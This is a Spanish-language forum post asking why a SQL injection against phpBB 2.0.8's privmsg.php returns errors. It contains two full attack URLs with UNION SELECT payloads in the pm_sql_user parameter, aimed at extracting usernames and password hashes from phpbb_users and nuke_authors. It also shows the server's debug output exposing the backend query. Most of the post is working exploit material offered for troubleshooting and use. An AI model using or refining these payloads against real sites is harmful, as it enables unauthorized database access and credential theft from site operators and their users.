No soy muy bueno con las inyecciones SQL, pero un amigo me ha dejado hacer algunas pruebas. Hago la inyección, pero me saca un error; mi pregunta es: ¿qué estoy haciendo mal? La versión es 2.0.8. ¿Estoy cometiendo algún error en el código, o este no es el código que debo utilizar? Gracias por su ayuda.
http://www.xxxxx.com/xxxx/xxxxxx/privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20username,null,user_password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,nullFROMphpbb_usersWHEREuser_level=1LIMIT1/*
DEBUG MODE
SQL Error : 1054 Unknown column 'username' in 'field list'
SELECT u.username AS username_1, u.user_id AS user_id_1, u2.username AS username_2, u2.user_id AS user_id_2, u.user_sig_bbcode_uid, u.user_posts, u.user_from, u.user_website, u.user_email, u.user_icq, u.user_aim, u.user_yim, u.user_regdate, u.user_msnm, u.user_viewemail, u.user_rank, u.user_sig, u.user_avatar, pm.*, pmt.privmsgs_bbcode_uid, pmt.privmsgs_text FROM reto4_privmsgs pm, reto4_privmsgs_text pmt, reto4_users u, reto4_users u2 WHERE pm.privmsgs_id = 99 AND pmt.privmsgs_text_id = pm.privmsgs_id AND pm.privmsgs_type=-99 UNION SELECT username,null,user_password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,nullFROMphpbb_usersWHEREuser_level=2LIMIT1/*AND ( ( pm.privmsgs_to_userid = 63 AND pm.privmsgs_type = 3 ) OR ( pm.privmsgs_from_userid = 63 AND pm.privmsgs_type = 4 ) ) AND u.user_id = pm.privmsgs_from_userid AND u2.user_id = pm.privmsgs_to_userid
Line : 246
File : /home/xxxx/public_html/xxxx/xxxxxxxx/privmsg.php
http://www.xxxx.com/xxxxxx/xxxxxx/privmsg.php?mode=post&u=2=name=Private_Messages&file=index&folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20aid,null,pwd,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20FROM%20nuke_authors%20WHERE%20cualquiera=1%20LIMIT%201/*
Could not query private message post information
DEBUG MODE
SQL Error : 1146 Table 'cualquiera_hola.nuke_authors' doesn't exist
SELECT u.username AS username_1, u.user_id AS user_id_1, u2.username AS username_2, u2.user_id AS user_id_2, u.user_sig_bbcode_uid, u.user_posts, u.user_from, u.user_website, u.user_email, u.user_icq, u.user_aim, u.user_yim, u.user_regdate, u.user_msnm, u.user_viewemail, u.user_rank, u.user_sig, u.user_avatar, pm.*, pmt.privmsgs_bbcode_uid, pmt.privmsgs_text FROM reto4_privmsgs pm, reto4_privmsgs_text pmt, reto4_users u, reto4_users u2 WHERE pm.privmsgs_id = 99 AND pmt.privmsgs_text_id = pm.privmsgs_id AND pm.privmsgs_type=-99 UNION SELECT aid,null,pwd,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null FROM nuke_authors WHERE cualquiera=1 LIMIT 1/*AND ( ( pm.privmsgs_to_userid = 63 AND pm.privmsgs_type = 3 ) OR ( pm.privmsgs_from_userid = 63 AND pm.privmsgs_type = 4 ) ) AND u.user_id = pm.privmsgs_from_userid AND u2.user_id = pm.privmsgs_to_userid
Line : 246
File : /home/xxxxxx/public_html/xxxx/xxxxxxx/privmsg.php